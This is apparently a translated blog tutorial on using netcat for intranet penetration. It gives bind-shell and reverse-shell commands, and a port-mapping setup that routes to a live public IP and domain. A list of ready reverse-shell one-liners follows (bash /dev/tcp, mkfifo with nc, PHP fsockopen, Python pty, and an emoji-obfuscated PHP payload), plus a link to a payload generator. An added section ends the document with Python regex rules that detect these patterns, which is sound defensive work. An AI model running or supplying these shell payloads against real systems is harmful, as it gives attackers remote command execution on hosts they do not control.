Intranet penetration (NC)
2022-06-29 22:49:00 【Xiao Xiaoran】
Intranet penetration technology (nc)
Netcat, usually called nc, has earned the reputation of being the "Swiss Army knife" of networking.
nc is small but powerful: it can read from and write to TCP or UDP network connections, and it is designed as a reliable back-end tool that other programs or scripts can drive directly. At the same time it is a feature-rich network debugging and development tool, because it can establish almost any kind of connection you might need and has some very useful built-in functions. It works directly on top of the socket API. In penetration testing it is most often used to bounce a shell.
Chat
One side listens on a port and the other side sends messages to that port, forming a simple server/client model.
- Server side:
nc -lvp 8888
Listen on port 8888: -l listen, -v show details, -p specify the port
- Client:
nc -nv 192.168.100.140 8888
Connect to port 8888 on the server: -n treat the address as a numeric IP (no DNS lookup), -v show details

File transfer
- Server side:
nc -lvp 8888 < test.txt
Listen on port 8888 and send test.txt to whoever connects: -l listen, -v show details, -p specify the port
- Client:
nc -nv 192.168.100.140 8888 > 1.txt
Connect to port 8888 on the server and write everything received to 1.txt: -n numeric IP address, -v show details. Do not add -z here: -z is zero-I/O (port scan) mode, which closes the connection without transferring any data. nc gives no integrity guarantee, so compare checksums (for example sha256sum) on both sides after the transfer.

Forward connection (bind shell)
The compromised host (the "broiler") listens, and the attacker's host connects to it.
Compromised host:
nc -lvvp 8888 -te cmd.exe
nc -lvvp 8888 -te /bin/bash
The compromised host listens on port 8888: -l listen, -vv show more details, -p specify the port, -t answer telnet negotiation so the session is interactive, -e redirect the given program's input and output to the connection, so the program is executed as soon as someone connects
Host:
nc -nvv 192.168.10.14 8888
The host connects to port 8888 on the compromised host: -n numeric IP address, -vv show more details


Reverse connection (reverse shell)
When the compromised host sits deep inside an intranet, the attacker's host must have a public IP and the compromised host connects out to it. Even when the compromised host itself has a public IP, inbound connections are usually blocked by a firewall while outbound connections are not, so a reverse connection is the better choice.
Compromised host:
nc -te /bin/bash 19.16.10.14 8888
Host:
nc -lvp 8888
Port mapping (Peanut Shell, natapp)
Only Peanut Shell is used as an example here…
Build a TCP mapping

Experimental environment
Compromised host: 192.168.100.133
Local host: n4221p5430.wicp.vip(103.46.128.49):25741 -> 127.0.0.1:5555
Execute on the local host:
nc -lvp 5555
Execute on the compromised host (any one of the following):
Various payloads can be generated on this site:
https://s.xiaoxiaoran.top/
echo 'bash -i >& /dev/tcp/103.46.128.49/25741 0>&1' | bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 103.46.128.49 25741 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc n4221p5430.wicp.vip 25741 >/tmp/f
php -r '$="1";$="2";$="3";$="4";$="5";$="6";$="7";$="8";$="9";$="0";$=" ";$="<";$=">";$="-";$="&";$🤩="i";$=".";$🤨="/";$🥰="a";$="b";$="i";$="h";$="c";$="d";$="e";$="f";$="k";$="n";$="o";$="p";$="s";$="x";$ = $. $. $. $. $. $. $. $. $;$ = "103.46.128.49";$ = 25741;$ = "sh". $. $. $🤩. $. $. $. $. $. $. $. $. $. $. $. $. $;$ = $($,$);$ = $. $. $. $;$($);'
php -r '$sock=fsockopen("103.46.128.49",25741);exec("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("103.46.128.49",25741);passthru("sh <&3 >&3 2>&3");'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("n4221p5430.wicp.vip",25741));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
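A defender-side check to pair with the bind and reverse shells above. This is an added example, not code from the original post: it runs a few coarse command-line heuristics over constructed process-execution events and flags the nc -e / -te, /dev/tcp, mkfifo-pipe and interpreter-socket patterns this article shows. The event format, rule names and the 10.0.0.5 address are assumptions.

```python
import re

# Heuristic indicators of netcat-style bind/reverse shells in process command lines.
# They mirror the techniques shown above; they are coarse and will need tuning per host.
RULES = [
    # nc/ncat with -e/-c (or the -te combination) handing a shell to the socket
    ("nc_exec_shell", re.compile(r"\b(nc|ncat|netcat)\b.*\s-(?:t?e|c)\s+\S*(sh|cmd\.exe)\b")),
    # bash -i with stdio redirected to /dev/tcp/<host>/<port>
    ("bash_dev_tcp", re.compile(r"bash\s+-i\b.*/dev/tcp/\S+/\d+")),
    # named pipe feeding sh -i whose output is piped back into nc
    ("mkfifo_nc_pipe", re.compile(r"mkfifo\s+\S+.*\|\s*sh\s+-i\b.*\|\s*(nc|ncat|netcat)\b")),
    # interpreter one-liners that open a socket and wire it to a shell
    ("interp_socket_shell", re.compile(
        r"\b(php|python[23]?|perl|ruby)\b.*(fsockopen|\.connect\().*(exec|passthru|dup2|pty\.spawn|system)")),
]


def match_rules(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_events(events):
    """Return (ts, host, matched_rules) for each event that triggered at least one rule."""
    hits = []
    for ev in events:
        names = match_rules(ev["cmdline"])
        if names:
            hits.append((ev["ts"], ev["host"], names))
    return hits


# Constructed sample process-execution events (not real telemetry); the last two are benign.
SAMPLE_EVENTS = [
    {"ts": "2022-06-29T22:49:01", "host": "web01", "cmdline": "nc -lvvp 8888 -te /bin/bash"},
    {"ts": "2022-06-29T22:49:05", "host": "web01",
     "cmdline": 'bash -c "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"'},
    {"ts": "2022-06-29T22:49:09", "host": "web02",
     "cmdline": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.5 4444 >/tmp/f"},
    {"ts": "2022-06-29T22:49:12", "host": "web02",
     "cmdline": "php -r '$sock=fsockopen(\"10.0.0.5\",4444);exec(\"sh <&3 >&3 2>&3\");'"},
    {"ts": "2022-06-29T22:50:00", "host": "web03", "cmdline": "nc -lvp 8888"},          # plain listener
    {"ts": "2022-06-29T22:50:03", "host": "web03", "cmdline": "nc -nv 192.168.100.140 8888 > 1.txt"},
]

if __name__ == "__main__":
    for ts, host, names in scan_events(SAMPLE_EVENTS):
        print(f"{ts} {host}: {', '.join(names)}")
```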